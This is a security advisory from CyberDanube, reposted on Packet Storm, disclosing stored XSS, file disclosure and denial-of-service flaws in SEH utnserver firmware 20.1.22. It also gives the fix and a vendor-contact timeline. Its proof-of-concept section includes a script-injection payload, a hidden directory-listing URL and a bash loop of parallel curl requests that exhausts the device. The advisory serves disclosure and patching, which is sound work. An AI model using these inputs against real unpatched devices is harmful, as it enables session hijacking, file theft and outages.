what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

SEH utnserver Pro/ProMAX / INU-100 20.1.22 XSS / DoS / File Disclosure

SEH utnserver Pro/ProMAX / INU-100 20.1.22 XSS / DoS / File Disclosure
Posted Jun 10, 2024
Authored by T. Weber | Site cyberdanube.com

SEH utnserver Pro/ProMAX and INU-100 version 20.1.22 suffers from cross site scripting, denial of service, and file disclosure vulnerabilities.

tags | exploit, denial of service, vulnerability, xss
advisories | CVE-2024-5420, CVE-2024-5421, CVE-2024-5422
SHA-256 | 67806c2f4c3195737e32e0a53dfdc16ae12e9f9db70895d10ba1b259619c40f6

SEH utnserver Pro/ProMAX / INU-100 20.1.22 XSS / DoS / File Disclosure

Change Mirror Download
CyberDanube Security Research 20240604-0
-------------------------------------------------------------------------------
title| Multiple Vulnerabilities
product| SEH utnserver Pro/ProMAX / INU-100
vulnerable version| 20.1.22
fixed version| 20.1.28
CVE number| CVE-2024-5420, CVE-2024-5421, CVE-2024-5422
impact| High
homepage| https://www.seh-technology.com/
found| 2024-03-04
by| T. Weber (Office Vienna)
| CyberDanube Security Research
| Vienna | St. Pölten
|
| https://www.cyberdanube.com
-------------------------------------------------------------------------------

Vendor description
-------------------------------------------------------------------------------
"We are SEH from Bielefeld - manufacturer of high-quality network solutions.
With over 35 years of experience in the fields of printing and networks, we
offer our customers a broad and high-level expertise in solutions for all types
of business environments."

Source: https://www.seh-technology.com/us/company/about-us.html


Vulnerable versions
-------------------------------------------------------------------------------
utnserver Pro / 20.1.22
utnserver ProMAX / 20.1.22
INU-100 / 20.1.22

Vulnerability overview
-------------------------------------------------------------------------------
1) Stored Cross-Site Scripting (CVE-2024-5420)
A Stored Cross-Site Scripting vulnerability was identified in the web interface
of the device. Multiple parameters, e.g. the device description, can be abused
to inject JavaScript code. An attacker can exploit this vulnerability by luring
a victim to visit a malicious website. Furthermore, it is possible to hijack
the session of the attacked user.

2) Authenticated File Disclosure (CVE-2024-5421)
Files and content of directories can be disclosed by integrated functions of
the device.

3) Denial of Service (CVE-2024-5422)
A Denial-of-Service vulnerability has been identified in the web interface of
the device. This can be triggered by sending a lot of requests that trigger
serial interface access on the device.

Proof of Concept
-------------------------------------------------------------------------------
1) Stored Cross-Site Scripting (CVE-2024-5420)
By accessing to the following URL, an attacker can modify the device
description:
http://$IP/device/description_en.html

By using malicious JavaScript payload, it is possible to execute arbitrary
code. This snippet demonstrates such a payload:
"><script>alert(document.location)</script>

Saving this text to the device description leads to a persistent cross-site
scripting. Therefore, everyone who openes the device description executes the
injected code in the context of the own browser.

2) Authenticated File Disclosure (CVE-2024-5421)
A hidden function in the web-interface of the device can be used to disclose
directories and files on operating system level. The function can be accessed
directly via the browser:

http://$IP/info/dir?/

This lists the current directory and provides the files to be downloaded.

3) Denial of Service (CVE-2024-5422)
For triggering a denial of service on the device, multiple file descriptors
are opened by using the following script:
-------------------------------------------------------------------------------
#!/bin/bash
echo "Parameters: $1 $2"
last_iter=$(($2 - 1))
for ((i=1; i<=$2; i++))
do
echo "[$i] Downloading application binary"
if [[ "$i" == "$last_iter" ]];then
curl http://$1/info/file?/application --output ./file_${i}.txt &> /dev/null
else
curl http://$1/info/file?/application --output ./file_${i}.txt &> /dev/null &
fi
done
-------------------------------------------------------------------------------

The vulnerabilities were manually verified on an emulated device by using the
MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).


Solution
-------------------------------------------------------------------------------
Install firmware version 20.1.28 to fix the vulnerabilities.

Workaround
-------------------------------------------------------------------------------
None


Recommendation
-------------------------------------------------------------------------------
CyberDanube recommends SEH Computertechnik customers to upgrade the firmware to
the latest version available.


Contact Timeline
-------------------------------------------------------------------------------
2024-03-11: Contacting SEH Computertechnik. Received reply from support. Sent
advisory to support.
2024-03-20: Asked for an update. Contact stated, that an internal timeline will
be defined.
2024-04-10: Asked for an update. Contact stated, that the vulnerabilities will
be patched soon.
2024-04-16: Contact sent link to patched firmware release candidate.
2024-05-31: Notified SEH Computertechnik that advisory will be released first
week of June. Received confirmation from SEH Computertechnik.
2024-06-04: Coordinated release of security advisory.


Web: https://www.cyberdanube.com
Twitter: https://twitter.com/cyberdanube
Mail: research at cyberdanube dot com

EOF T. Weber / @2024

Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    14 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    16 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close